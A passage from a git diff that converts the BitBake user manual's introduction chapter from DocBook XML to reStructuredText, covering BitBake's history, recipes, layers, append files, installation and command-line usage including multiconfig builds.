- </section>
-</appendix>
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-intro.rst b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-intro.rst
new file mode 100644
index 0000000000..6f9d392935
--- /dev/null
+++ b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-intro.rst
@@ -0,0 +1,651 @@
+.. SPDX-License-Identifier: CC-BY-2.5
+
+========
+Overview
+========
+
+|
+
+Welcome to the BitBake User Manual. This manual provides information on
+the BitBake tool. The information attempts to be as independent as
+possible regarding systems that use BitBake, such as OpenEmbedded and
+the Yocto Project. In some cases, scenarios or examples within the
+context of a build system are used in the manual to help with
+understanding. For these cases, the manual clearly states the context.
+
+.. _intro:
+
+Introduction
+============
+
+Fundamentally, BitBake is a generic task execution engine that allows
+shell and Python tasks to be run efficiently and in parallel while
+working within complex inter-task dependency constraints. One of
+BitBake's main users, OpenEmbedded, takes this core and builds embedded
+Linux software stacks using a task-oriented approach.
+
+Conceptually, BitBake is similar to GNU Make in some regards but has
+significant differences:
+
+- BitBake executes tasks according to provided metadata that builds up
+ the tasks. Metadata is stored in recipe (``.bb``) and related recipe
+ "append" (``.bbappend``) files, configuration (``.conf``) and
+ underlying include (``.inc``) files, and in class (``.bbclass``)
+ files. The metadata provides BitBake with instructions on what tasks
+ to run and the dependencies between those tasks.
+
+- BitBake includes a fetcher library for obtaining source code from
+ various places such as local files, source control systems, or
+ websites.
+
+- The instructions for each unit to be built (e.g. a piece of software)
+ are known as "recipe" files and contain all the information about the
+ unit (dependencies, source file locations, checksums, description and
+ so on).
+
+- BitBake includes a client/server abstraction and can be used from a
+ command line or used as a service over XML-RPC and has several
+ different user interfaces.
+
+History and Goals
+=================
+
+BitBake was originally a part of the OpenEmbedded project. It was
+inspired by the Portage package management system used by the Gentoo
+Linux distribution. On December 7, 2004, OpenEmbedded project team
+member Chris Larson split the project into two distinct pieces:
+
+- BitBake, a generic task executor
+
+- OpenEmbedded, a metadata set utilized by BitBake
+
+Today, BitBake is the primary basis of the
+`OpenEmbedded <http://www.openembedded.org/>`__ project, which is being
+used to build and maintain Linux distributions such as the `Angstrom
+Distribution <http://www.angstrom-distribution.org/>`__, and which is
+also being used as the build tool for Linux projects such as the `Yocto
+Project <http://www.yoctoproject.org>`__.
+
+Prior to BitBake, no other build tool adequately met the needs of an
+aspiring embedded Linux distribution. All of the build systems used by
+traditional desktop Linux distributions lacked important functionality,
+and none of the ad hoc Buildroot-based systems, prevalent in the
+embedded space, were scalable or maintainable.
+
+Some important original goals for BitBake were:
+
+- Handle cross-compilation.
+
+- Handle inter-package dependencies (build time on target architecture,
+ build time on native architecture, and runtime).
+
+- Support running any number of tasks within a given package,
+ including, but not limited to, fetching upstream sources, unpacking
+ them, patching them, configuring them, and so forth.
+
+- Be Linux distribution agnostic for both build and target systems.
+
+- Be architecture agnostic.
+
+- Support multiple build and target operating systems (e.g. Cygwin, the
+ BSDs, and so forth).
+
+- Be self-contained, rather than tightly integrated into the build
+ machine's root filesystem.
+
+- Handle conditional metadata on the target architecture, operating
+ system, distribution, and machine.
+
+- Be easy to use the tools to supply local metadata and packages
+ against which to operate.
+
+- Be easy to use BitBake to collaborate between multiple projects for
+ their builds.
+
+- Provide an inheritance mechanism to share common metadata between
+ many packages.
+
+Over time it became apparent that some further requirements were
+necessary:
+
+- Handle variants of a base recipe (e.g. native, sdk, and multilib).
+
+- Split metadata into layers and allow layers to enhance or override
+ other layers.
+
+- Allow representation of a given set of input variables to a task as a
+ checksum. Based on that checksum, allow acceleration of builds with
+ prebuilt components.
+
+BitBake satisfies all the original requirements and many more with
+extensions being made to the basic functionality to reflect the
+additional requirements. Flexibility and power have always been the
+priorities. BitBake is highly extensible and supports embedded Python
+code and execution of any arbitrary tasks.
+
+.. _Concepts:
+
+Concepts
+========
+
+BitBake is a program written in the Python language. At the highest
+level, BitBake interprets metadata, decides what tasks are required to
+run, and executes those tasks. Similar to GNU Make, BitBake controls how
+software is built. GNU Make achieves its control through "makefiles",
+while BitBake uses "recipes".
+
+BitBake extends the capabilities of a simple tool like GNU Make by
+allowing for the definition of much more complex tasks, such as
+assembling entire embedded Linux distributions.
+
+The remainder of this section introduces several concepts that should be
+understood in order to better leverage the power of BitBake.
+
+Recipes
+-------
+
+BitBake Recipes, which are denoted by the file extension ``.bb``, are
+the most basic metadata files. These recipe files provide BitBake with
+the following:
+
+- Descriptive information about the package (author, homepage, license,
+ and so on)
+
+- The version of the recipe
+
+- Existing dependencies (both build and runtime dependencies)
+
+- Where the source code resides and how to fetch it
+
+- Whether the source code requires any patches, where to find them, and
+ how to apply them
+
+- How to configure and compile the source code
+
+- How to assemble the generated artifacts into one or more installable
+ packages
+
+- Where on the target machine to install the package or packages
+ created
+
+Within the context of BitBake, or any project utilizing BitBake as its
+build system, files with the ``.bb`` extension are referred to as
+recipes.
+
+.. note::
+
+ The term "package" is also commonly used to describe recipes.
+ However, since the same word is used to describe packaged output from
+ a project, it is best to maintain a single descriptive term -
+ "recipes". Put another way, a single "recipe" file is quite capable
+ of generating a number of related but separately installable
+ "packages". In fact, that ability is fairly common.
+
+Configuration Files
+-------------------
+
+Configuration files, which are denoted by the ``.conf`` extension,
+define various configuration variables that govern the project's build
+process. These files fall into several areas that define machine
+configuration, distribution configuration, possible compiler tuning,
+general common configuration, and user configuration. The main
+configuration file is the sample ``bitbake.conf`` file, which is located
+within the BitBake source tree ``conf`` directory.
+
+Classes
+-------
+
+Class files, which are denoted by the ``.bbclass`` extension, contain
+information that is useful to share between metadata files. The BitBake
+source tree currently comes with one class metadata file called
+``base.bbclass``. You can find this file in the ``classes`` directory.
+The ``base.bbclass`` class files is special since it is always included
+automatically for all recipes and classes. This class contains
+definitions for standard basic tasks such as fetching, unpacking,
+configuring (empty by default), compiling (runs any Makefile present),
+installing (empty by default) and packaging (empty by default). These
+tasks are often overridden or extended by other classes added during the
+project development process.
+
+Layers
+------
+
+Layers allow you to isolate different types of customizations from each
+other. While you might find it tempting to keep everything in one layer
+when working on a single project, the more modular your metadata, the
+easier it is to cope with future changes.
+
+To illustrate how you can use layers to keep things modular, consider
+customizations you might make to support a specific target machine.
+These types of customizations typically reside in a special layer,
+rather than a general layer, called a Board Support Package (BSP) layer.
+Furthermore, the machine customizations should be isolated from recipes
+and metadata that support a new GUI environment, for example. This
+situation gives you a couple of layers: one for the machine
+configurations and one for the GUI environment. It is important to
+understand, however, that the BSP layer can still make machine-specific
+additions to recipes within the GUI environment layer without polluting
+the GUI layer itself with those machine-specific changes. You can
+accomplish this through a recipe that is a BitBake append
+(``.bbappend``) file.
+
+.. _append-bbappend-files:
+
+Append Files
+------------
+
+Append files, which are files that have the ``.bbappend`` file
+extension, extend or override information in an existing recipe file.
+
+BitBake expects every append file to have a corresponding recipe file.
+Furthermore, the append file and corresponding recipe file must use the
+same root filename. The filenames can differ only in the file type
+suffix used (e.g. ``formfactor_0.0.bb`` and
+``formfactor_0.0.bbappend``).
+
+Information in append files extends or overrides the information in the
+underlying, similarly-named recipe files.
+
+When you name an append file, you can use the "``%``" wildcard character
+to allow for matching recipe names. For example, suppose you have an
+append file named as follows: ::
+
+ busybox_1.21.%.bbappend
+
+That append file
+would match any ``busybox_1.21.``\ x\ ``.bb`` version of the recipe. So,
+the append file would match the following recipe names: ::
+
+ busybox_1.21.1.bb
+ busybox_1.21.2.bb
+ busybox_1.21.3.bb
+
+.. note::
+
+ The use of the " % " character is limited in that it only works directly in
+ front of the .bbappend portion of the append file's name. You cannot use the
+ wildcard character in any other location of the name.
+
+If the ``busybox`` recipe was updated to ``busybox_1.3.0.bb``, the
+append name would not match. However, if you named the append file
+``busybox_1.%.bbappend``, then you would have a match.
+
+In the most general case, you could name the append file something as
+simple as ``busybox_%.bbappend`` to be entirely version independent.
+
+Obtaining BitBake
+=================
+
+You can obtain BitBake several different ways:
+
+- **Cloning BitBake:** Using Git to clone the BitBake source code
+ repository is the recommended method for obtaining BitBake. Cloning
+ the repository makes it easy to get bug fixes and have access to
+ stable branches and the master branch. Once you have cloned BitBake,
+ you should use the latest stable branch for development since the
+ master branch is for BitBake development and might contain less
+ stable changes.
+
+ You usually need a version of BitBake that matches the metadata you
+ are using. The metadata is generally backwards compatible but not
+ forward compatible.
+
+ Here is an example that clones the BitBake repository: ::
+
+ $ git clone git://git.openembedded.org/bitbake
+
+ This command clones the BitBake
+ Git repository into a directory called ``bitbake``. Alternatively,
+ you can designate a directory after the ``git clone`` command if you
+ want to call the new directory something other than ``bitbake``. Here
+ is an example that names the directory ``bbdev``: ::
+
+ $ git clone git://git.openembedded.org/bitbake bbdev
+
+- **Installation using your Distribution Package Management System:**
+ This method is not recommended because the BitBake version that is
+ provided by your distribution, in most cases, is several releases
+ behind a snapshot of the BitBake repository.
+
+- **Taking a snapshot of BitBake:** Downloading a snapshot of BitBake
+ from the source code repository gives you access to a known branch or
+ release of BitBake.
+
+ .. note::
+
+ Cloning the Git repository, as described earlier, is the preferred
+ method for getting BitBake. Cloning the repository makes it easier
+ to update as patches are added to the stable branches.
+
+ The following example downloads a snapshot of BitBake version 1.17.0: ::
+
+ $ wget http://git.openembedded.org/bitbake/snapshot/bitbake-1.17.0.tar.gz
+ $ tar zxpvf bitbake-1.17.0.tar.gz
+
+ After extraction of the tarball using
+ the tar utility, you have a directory entitled ``bitbake-1.17.0``.
+
+- **Using the BitBake that Comes With Your Build Checkout:** A final
+ possibility for getting a copy of BitBake is that it already comes
+ with your checkout of a larger BitBake-based build system, such as
+ Poky. Rather than manually checking out individual layers and gluing
+ them together yourself, you can check out an entire build system. The
+ checkout will already include a version of BitBake that has been
+ thoroughly tested for compatibility with the other components. For
+ information on how to check out a particular BitBake-based build
+ system, consult that build system's supporting documentation.
+
+.. _bitbake-user-manual-command:
+
+The BitBake Command
+===================
+
+The ``bitbake`` command is the primary interface to the BitBake tool.
+This section presents the BitBake command syntax and provides several
+execution examples.
+
+Usage and syntax
+----------------
+
+Following is the usage and syntax for BitBake: ::
+
+ $ bitbake -h
+ Usage: bitbake [options] [recipename/target recipe:do_task ...]
+
+ Executes the specified task (default is 'build') for a given set of target recipes (.bb files).
+ It is assumed there is a conf/bblayers.conf available in cwd or in BBPATH which
+ will provide the layer, BBFILES and other configuration information.
+
+ Options:
+ --version show program's version number and exit
+ -h, --help show this help message and exit
+ -b BUILDFILE, --buildfile=BUILDFILE
+ Execute tasks from a specific .bb recipe directly.
+ WARNING: Does not handle any dependencies from other
+ recipes.
+ -k, --continue Continue as much as possible after an error. While the
+ target that failed and anything depending on it cannot
+ be built, as much as possible will be built before
+ stopping.
+ -f, --force Force the specified targets/task to run (invalidating
+ any existing stamp file).
+ -c CMD, --cmd=CMD Specify the task to execute. The exact options
+ available depend on the metadata. Some examples might
+ be 'compile' or 'populate_sysroot' or 'listtasks' may
+ give a list of the tasks available.
+ -C INVALIDATE_STAMP, --clear-stamp=INVALIDATE_STAMP
+ Invalidate the stamp for the specified task such as
+ 'compile' and then run the default task for the
+ specified target(s).
+ -r PREFILE, --read=PREFILE
+ Read the specified file before bitbake.conf.
+ -R POSTFILE, --postread=POSTFILE
+ Read the specified file after bitbake.conf.
+ -v, --verbose Enable tracing of shell tasks (with 'set -x'). Also
+ print bb.note(...) messages to stdout (in addition to
+ writing them to ${T}/log.do_&lt;task&gt;).
+ -D, --debug Increase the debug level. You can specify this more
+ than once. -D sets the debug level to 1, where only
+ bb.debug(1, ...) messages are printed to stdout; -DD
+ sets the debug level to 2, where both bb.debug(1, ...)
+ and bb.debug(2, ...) messages are printed; etc.
+ Without -D, no debug messages are printed. Note that
+ -D only affects output to stdout. All debug messages
+ are written to ${T}/log.do_taskname, regardless of the
+ debug level.
+ -q, --quiet Output less log message data to the terminal. You can
+ specify this more than once.
+ -n, --dry-run Don't execute, just go through the motions.
+ -S SIGNATURE_HANDLER, --dump-signatures=SIGNATURE_HANDLER
+ Dump out the signature construction information, with
+ no task execution. The SIGNATURE_HANDLER parameter is
+ passed to the handler. Two common values are none and
+ printdiff but the handler may define more/less. none
+ means only dump the signature, printdiff means compare
+ the dumped signature with the cached one.
+ -p, --parse-only Quit after parsing the BB recipes.
+ -s, --show-versions Show current and preferred versions of all recipes.
+ -e, --environment Show the global or per-recipe environment complete
+ with information about where variables were
+ set/changed.
+ -g, --graphviz Save dependency tree information for the specified
+ targets in the dot syntax.
+ -I EXTRA_ASSUME_PROVIDED, --ignore-deps=EXTRA_ASSUME_PROVIDED
+ Assume these dependencies don't exist and are already
+ provided (equivalent to ASSUME_PROVIDED). Useful to
+ make dependency graphs more appealing
+ -l DEBUG_DOMAINS, --log-domains=DEBUG_DOMAINS
+ Show debug logging for the specified logging domains
+ -P, --profile Profile the command and save reports.
+ -u UI, --ui=UI The user interface to use (knotty, ncurses or taskexp
+ - default knotty).
+ --token=XMLRPCTOKEN Specify the connection token to be used when
+ connecting to a remote server.
+ --revisions-changed Set the exit code depending on whether upstream
+ floating revisions have changed or not.
+ --server-only Run bitbake without a UI, only starting a server
+ (cooker) process.
+ -B BIND, --bind=BIND The name/address for the bitbake xmlrpc server to bind
+ to.
+ -T SERVER_TIMEOUT, --idle-timeout=SERVER_TIMEOUT
+ Set timeout to unload bitbake server due to
+ inactivity, set to -1 means no unload, default:
+ Environment variable BB_SERVER_TIMEOUT.
+ --no-setscene Do not run any setscene tasks. sstate will be ignored
+ and everything needed, built.
+ --setscene-only Only run setscene tasks, don't run any real tasks.
+ --remote-server=REMOTE_SERVER
+ Connect to the specified server.
+ -m, --kill-server Terminate any running bitbake server.
+ --observe-only Connect to a server as an observing-only client.
+ --status-only Check the status of the remote bitbake server.
+ -w WRITEEVENTLOG, --write-log=WRITEEVENTLOG
+ Writes the event log of the build to a bitbake event
+ json file. Use '' (empty string) to assign the name
+ automatically.
+ --runall=RUNALL Run the specified task for any recipe in the taskgraph
+ of the specified target (even if it wouldn't otherwise
+ have run).
+ --runonly=RUNONLY Run only the specified task within the taskgraph of
+ the specified targets (and any task dependencies those
+ tasks may have).
+
+.. _bitbake-examples:
+
+Examples
+--------
+
+This section presents some examples showing how to use BitBake.
+
+.. _example-executing-a-task-against-a-single-recipe:
+
+Executing a Task Against a Single Recipe
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Executing tasks for a single recipe file is relatively simple. You
+specify the file in question, and BitBake parses it and executes the
+specified task. If you do not specify a task, BitBake executes the
+default task, which is "build". BitBake obeys inter-task dependencies
+when doing so.
+
+The following command runs the build task, which is the default task, on
+the ``foo_1.0.bb`` recipe file: ::
+
+ $ bitbake -b foo_1.0.bb
+
+The following command runs the clean task on the ``foo.bb`` recipe file: ::
+
+ $ bitbake -b foo.bb -c clean
+
+.. note::
+
+ The "-b" option explicitly does not handle recipe dependencies. Other
+ than for debugging purposes, it is instead recommended that you use
+ the syntax presented in the next section.
+
+Executing Tasks Against a Set of Recipe Files
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+There are a number of additional complexities introduced when one wants
+to manage multiple ``.bb`` files. Clearly there needs to be a way to
+tell BitBake what files are available and, of those, which you want to
+execute. There also needs to be a way for each recipe to express its
+dependencies, both for build-time and runtime. There must be a way for
+you to express recipe preferences when multiple recipes provide the same
+functionality, or when there are multiple versions of a recipe.
+
+The ``bitbake`` command, when not using "--buildfile" or "-b" only
+accepts a "PROVIDES". You cannot provide anything else. By default, a
+recipe file generally "PROVIDES" its "packagename" as shown in the
+following example: ::
+
+ $ bitbake foo
+
+This next example "PROVIDES" the
+package name and also uses the "-c" option to tell BitBake to just
+execute the ``do_clean`` task: ::
+
+ $ bitbake -c clean foo
+
+Executing a List of Task and Recipe Combinations
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The BitBake command line supports specifying different tasks for
+individual targets when you specify multiple targets. For example,
+suppose you had two targets (or recipes) ``myfirstrecipe`` and
+``mysecondrecipe`` and you needed BitBake to run ``taskA`` for the first
+recipe and ``taskB`` for the second recipe: ::
+
+ $ bitbake myfirstrecipe:do_taskA mysecondrecipe:do_taskB
+
+Generating Dependency Graphs
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+BitBake is able to generate dependency graphs using the ``dot`` syntax.
+You can convert these graphs into images using the ``dot`` tool from
+`Graphviz <http://www.graphviz.org>`__.
+
+When you generate a dependency graph, BitBake writes two files to the
+current working directory:
+
+- ``task-depends.dot``: Shows dependencies between tasks. These
+ dependencies match BitBake's internal task execution list.
+
+- ``pn-buildlist``: Shows a simple list of targets that are to be
+ built.
+
+To stop depending on common depends, use the "-I" depend option and
+BitBake omits them from the graph. Leaving this information out can
+produce more readable graphs. This way, you can remove from the graph
+``DEPENDS`` from inherited classes such as ``base.bbclass``.
+
+Here are two examples that create dependency graphs. The second example
+omits depends common in OpenEmbedded from the graph: ::
+
+ $ bitbake -g foo
+
+ $ bitbake -g -I virtual/kernel -I eglibc foo
+
+Executing a Multiple Configuration Build
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+BitBake is able to build multiple images or packages using a single
+command where the different targets require different configurations
+(multiple configuration builds). Each target, in this scenario, is
+referred to as a "multiconfig".
+
+To accomplish a multiple configuration build, you must define each
+target's configuration separately using a parallel configuration file in
+the build directory. The location for these multiconfig configuration
+files is specific. They must reside in the current build directory in a
+sub-directory of ``conf`` named ``multiconfig``. Following is an example
+for two separate targets:
+
+.. image:: figures/bb_multiconfig_files.png
+ :align: center
+
+The reason for this required file hierarchy is because the ``BBPATH``
+variable is not constructed until the layers are parsed. Consequently,
+using the configuration file as a pre-configuration file is not possible
+unless it is located in the current working directory.
+
+Minimally, each configuration file must define the machine and the
+temporary directory BitBake uses for the build. Suggested practice
+dictates that you do not overlap the temporary directories used during
+the builds.
+
+Aside from separate configuration files for each target, you must also
+enable BitBake to perform multiple configuration builds. Enabling is
+accomplished by setting the
+:term:`BBMULTICONFIG` variable in the
+``local.conf`` configuration file. As an example, suppose you had
+configuration files for ``target1`` and ``target2`` defined in the build
+directory. The following statement in the ``local.conf`` file both
+enables BitBake to perform multiple configuration builds and specifies
+the two extra multiconfigs: ::
+
+ BBMULTICONFIG = "target1 target2"
+
+Once the target configuration files are in place and BitBake has been
+enabled to perform multiple configuration builds, use the following
+command form to start the builds: ::
+
+ $ bitbake [mc:multiconfigname:]target [[[mc:multiconfigname:]target] ... ]
+
+Here is an example for two extra multiconfigs: ``target1`` and ``target2``: ::
+
+ $ bitbake mc::target mc:target1:target mc:target2:target
+
+.. _bb-enabling-multiple-configuration-build-dependencies:
+
+Enabling Multiple Configuration Build Dependencies
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Sometimes dependencies can exist between targets (multiconfigs) in a
+multiple configuration build. For example, suppose that in order to
+build an image for a particular architecture, the root filesystem of
+another build for a different architecture needs to exist. In other
+words, the image for the first multiconfig depends on the root
+filesystem of the second multiconfig. This dependency is essentially
+that the task in the recipe that builds one multiconfig is dependent on
+the completion of the task in the recipe that builds another
+multiconfig.
+
+To enable dependencies in a multiple configuration build, you must
+declare the dependencies in the recipe using the following statement
+form: ::
+
+ task_or_package[mcdepends] = "mc:from_multiconfig:to_multiconfig:recipe_name:task_on_which_to_depend"
+
+To better show how to use this statement, consider an example with two
+multiconfigs: ``target1`` and ``target2``: ::
+
+ image_task[mcdepends] = "mc:target1:target2:image2:rootfs_task"
+
+In this example, the
+``from_multiconfig`` is "target1" and the ``to_multiconfig`` is "target2". The
+task on which the image whose recipe contains image_task depends on the
+completion of the rootfs_task used to build out image2, which is
+associated with the "target2" multiconfig.
+
+Once you set up this dependency, you can build the "target1" multiconfig
+using a BitBake command as follows: ::
+
+ $ bitbake mc:target1:image1
+
+This command executes all the tasks needed to create ``image1`` for the "target1"
+multiconfig. Because of the dependency, BitBake also executes through
+the ``rootfs_task`` for the "target2" multiconfig build.
+
+Having a recipe depend on the root filesystem of another build might not
+seem that useful. Consider this change to the statement in the image1
+recipe: ::
+
+ image_task[mcdepends] = "mc:target1:target2:image2:image_task"
+
+In this case, BitBake must create ``image2`` for the "target2" build since
+the "target1" build depends on it.
+
+Because "target1" and "target2" are enabled for multiple configuration
+builds and have separate configuration files, BitBake places the
+artifacts for each build in the respective temporary build directories.
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-intro.xml b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-intro.xml
deleted file mode 100644
index 995c2fa7bf..0000000000
--- a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-intro.xml
+++ /dev/null
@@ -1,891 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
- "http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd">
-
-<chapter id="bitbake-user-manual-intro">
- <title>Overview</title>
-
- <para>
- Welcome to the BitBake User Manual.
- This manual provides information on the BitBake tool.
- The information attempts to be as independent as possible regarding
- systems that use BitBake, such as OpenEmbedded and the
- Yocto Project.
- In some cases, scenarios or examples within the context of
- a build system are used in the manual to help with understanding.
- For these cases, the manual clearly states the context.
- </para>
-
- <section id="intro">
- <title>Introduction</title>
-
- <para>
- Fundamentally, BitBake is a generic task execution
- engine that allows shell and Python tasks to be run
- efficiently and in parallel while working within
- complex inter-task dependency constraints.
- One of BitBake's main users, OpenEmbedded, takes this core
- and builds embedded Linux software stacks using
- a task-oriented approach.
- </para>
-
- <para>
- Conceptually, BitBake is similar to GNU Make in
- some regards but has significant differences:
- <itemizedlist>
- <listitem><para>
- BitBake executes tasks according to provided
- metadata that builds up the tasks.
- Metadata is stored in recipe (<filename>.bb</filename>)
- and related recipe "append" (<filename>.bbappend</filename>)
- files, configuration (<filename>.conf</filename>) and
- underlying include (<filename>.inc</filename>) files, and
- in class (<filename>.bbclass</filename>) files.
- The metadata provides
- BitBake with instructions on what tasks to run and
- the dependencies between those tasks.
- </para></listitem>
- <listitem><para>
- BitBake includes a fetcher library for obtaining source
- code from various places such as local files, source control
- systems, or websites.
- </para></listitem>
- <listitem><para>
- The instructions for each unit to be built (e.g. a piece
- of software) are known as "recipe" files and
- contain all the information about the unit
- (dependencies, source file locations, checksums, description
- and so on).
- </para></listitem>
- <listitem><para>
- BitBake includes a client/server abstraction and can
- be used from a command line or used as a service over
- XML-RPC and has several different user interfaces.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id="history-and-goals">
- <title>History and Goals</title>
-
- <para>
- BitBake was originally a part of the OpenEmbedded project.
- It was inspired by the Portage package management system
- used by the Gentoo Linux distribution.
- On December 7, 2004, OpenEmbedded project team member
- Chris Larson split the project into two distinct pieces:
- <itemizedlist>
- <listitem><para>BitBake, a generic task executor</para></listitem>
- <listitem><para>OpenEmbedded, a metadata set utilized by
- BitBake</para></listitem>
- </itemizedlist>
- Today, BitBake is the primary basis of the
- <ulink url="http://www.openembedded.org/">OpenEmbedded</ulink>
- project, which is being used to build and maintain Linux
- distributions such as the
- <ulink url='http://www.angstrom-distribution.org/'>Angstrom Distribution</ulink>,
- and which is also being used as the build tool for Linux projects
- such as the
- <ulink url='http://www.yoctoproject.org'>Yocto Project</ulink>.
- </para>
-
- <para>
- Prior to BitBake, no other build tool adequately met the needs of
- an aspiring embedded Linux distribution.
- All of the build systems used by traditional desktop Linux
- distributions lacked important functionality, and none of the
- ad hoc Buildroot-based systems, prevalent in the
- embedded space, were scalable or maintainable.
- </para>
-
- <para>
- Some important original goals for BitBake were:
- <itemizedlist>
- <listitem><para>
- Handle cross-compilation.
- </para></listitem>
- <listitem><para>
- Handle inter-package dependencies (build time on
- target architecture, build time on native
- architecture, and runtime).
- </para></listitem>
- <listitem><para>
- Support running any number of tasks within a given
- package, including, but not limited to, fetching
- upstream sources, unpacking them, patching them,
- configuring them, and so forth.
- </para></listitem>
- <listitem><para>
- Be Linux distribution agnostic for both build and
- target systems.
- </para></listitem>
- <listitem><para>
- Be architecture agnostic.
- </para></listitem>
- <listitem><para>
- Support multiple build and target operating systems
- (e.g. Cygwin, the BSDs, and so forth).
- </para></listitem>
- <listitem><para>
- Be self-contained, rather than tightly
- integrated into the build machine's root
- filesystem.
- </para></listitem>
- <listitem><para>
- Handle conditional metadata on the target architecture,
- operating system, distribution, and machine.
- </para></listitem>
- <listitem><para>
- Be easy to use the tools to supply local metadata and packages
- against which to operate.
- </para></listitem>
- <listitem><para>
- Be easy to use BitBake to collaborate between multiple
- projects for their builds.
- </para></listitem>
- <listitem><para>
- Provide an inheritance mechanism to share
- common metadata between many packages.
- </para></listitem>
- </itemizedlist>
- Over time it became apparent that some further requirements
- were necessary:
- <itemizedlist>
- <listitem><para>
- Handle variants of a base recipe (e.g. native, sdk,
- and multilib).
- </para></listitem>
- <listitem><para>
- Split metadata into layers and allow layers
- to enhance or override other layers.
- </para></listitem>
- <listitem><para>
- Allow representation of a given set of input variables
- to a task as a checksum.
- Based on that checksum, allow acceleration of builds
- with prebuilt components.
- </para></listitem>
- </itemizedlist>
- BitBake satisfies all the original requirements and many more
- with extensions being made to the basic functionality to
- reflect the additional requirements.
- Flexibility and power have always been the priorities.
- BitBake is highly extensible and supports embedded Python code and
- execution of any arbitrary tasks.
- </para>
- </section>
-
- <section id="Concepts">
- <title>Concepts</title>
-
- <para>
- BitBake is a program written in the Python language.
- At the highest level, BitBake interprets metadata, decides
- what tasks are required to run, and executes those tasks.
- Similar to GNU Make, BitBake controls how software is
- built.
- GNU Make achieves its control through "makefiles", while
- BitBake uses "recipes".
- </para>
-
- <para>
- BitBake extends the capabilities of a simple
- tool like GNU Make by allowing for the definition of much more
- complex tasks, such as assembling entire embedded Linux
- distributions.
- </para>
-
- <para>
- The remainder of this section introduces several concepts
- that should be understood in order to better leverage
- the power of BitBake.
- </para>
-
- <section id='recipes'>
- <title>Recipes</title>
-
- <para>
- BitBake Recipes, which are denoted by the file extension
- <filename>.bb</filename>, are the most basic metadata files.
- These recipe files provide BitBake with the following:
- <itemizedlist>
- <listitem><para>Descriptive information about the
- package (author, homepage, license, and so on)</para></listitem>
- <listitem><para>The version of the recipe</para></listitem>
- <listitem><para>Existing dependencies (both build
- and runtime dependencies)</para></listitem>
- <listitem><para>Where the source code resides and
- how to fetch it</para></listitem>
- <listitem><para>Whether the source code requires
- any patches, where to find them, and how to apply
- them</para></listitem>
- <listitem><para>How to configure and compile the
- source code</para></listitem>
- <listitem><para>How to assemble the generated artifacts into
- one or more installable packages</para></listitem>
- <listitem><para>Where on the target machine to install the
- package or packages created</para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Within the context of BitBake, or any project utilizing BitBake
- as its build system, files with the <filename>.bb</filename>
- extension are referred to as <firstterm>recipes</firstterm>.
- <note>
- The term "package" is also commonly used to describe recipes.
- However, since the same word is used to describe packaged
- output from a project, it is best to maintain a single
- descriptive term - "recipes".
- Put another way, a single "recipe" file is quite capable
- of generating a number of related but separately installable
- "packages".
- In fact, that ability is fairly common.
- </note>
- </para>
- </section>
-
- <section id='configuration-files'>
- <title>Configuration Files</title>
-
- <para>
- Configuration files, which are denoted by the
- <filename>.conf</filename> extension, define
- various configuration variables that govern the project's build
- process.
- These files fall into several areas that define
- machine configuration, distribution configuration,
- possible compiler tuning, general common
- configuration, and user configuration.
- The main configuration file is the sample
- <filename>bitbake.conf</filename> file, which is
- located within the BitBake source tree
- <filename>conf</filename> directory.
- </para>
- </section>
-
- <section id='classes'>
- <title>Classes</title>
-
- <para>
- Class files, which are denoted by the
- <filename>.bbclass</filename> extension, contain
- information that is useful to share between metadata files.
- The BitBake source tree currently comes with one class metadata file
- called <filename>base.bbclass</filename>.
- You can find this file in the
- <filename>classes</filename> directory.
- The <filename>base.bbclass</filename> class files is special since it
- is always included automatically for all recipes
- and classes.
- This class contains definitions for standard basic tasks such
- as fetching, unpacking, configuring (empty by default),
- compiling (runs any Makefile present), installing (empty by
- default) and packaging (empty by default).
- These tasks are often overridden or extended by other classes
- added during the project development process.
- </para>
- </section>
-
- <section id='layers'>
- <title>Layers</title>
-
- <para>
- Layers allow you to isolate different types of
- customizations from each other.
- While you might find it tempting to keep everything in one layer
- when working on a single project, the more modular
- your metadata, the easier it is to cope with future changes.
- </para>
-
- <para>
- To illustrate how you can use layers to keep things modular,
- consider customizations you might make to support a specific target machine.
- These types of customizations typically reside in a special layer,
- rather than a general layer, called a <firstterm>Board Support Package</firstterm> (BSP)
- layer.
- Furthermore, the machine customizations should be isolated from
- recipes and metadata that support a new GUI environment, for
- example.
- This situation gives you a couple of layers: one for the machine
- configurations and one for the GUI environment.
- It is important to understand, however, that the BSP layer can still
- make machine-specific additions to recipes within
- the GUI environment layer without polluting the GUI layer itself
- with those machine-specific changes.
- You can accomplish this through a recipe that is a BitBake append
- (<filename>.bbappend</filename>) file.
- </para>
- </section>
-
- <section id='append-bbappend-files'>
- <title>Append Files</title>
-
- <para>
- Append files, which are files that have the
- <filename>.bbappend</filename> file extension, extend or
- override information in an existing recipe file.
- </para>
-
- <para>
- BitBake expects every append file to have a corresponding recipe file.
- Furthermore, the append file and corresponding recipe file
- must use the same root filename.
- The filenames can differ only in the file type suffix used
- (e.g. <filename>formfactor_0.0.bb</filename> and
- <filename>formfactor_0.0.bbappend</filename>).
- </para>
-
- <para>
- Information in append files extends or
- overrides the information in the underlying,
- similarly-named recipe files.
- </para>
-
- <para>
- When you name an append file, you can use the
- "<filename>%</filename>" wildcard character to allow for matching
- recipe names.
- For example, suppose you have an append file named
- as follows:
- <literallayout class='monospaced'>
- busybox_1.21.%.bbappend
- </literallayout>
- That append file would match any <filename>busybox_1.21.</filename><replaceable>x</replaceable><filename>.bb</filename>
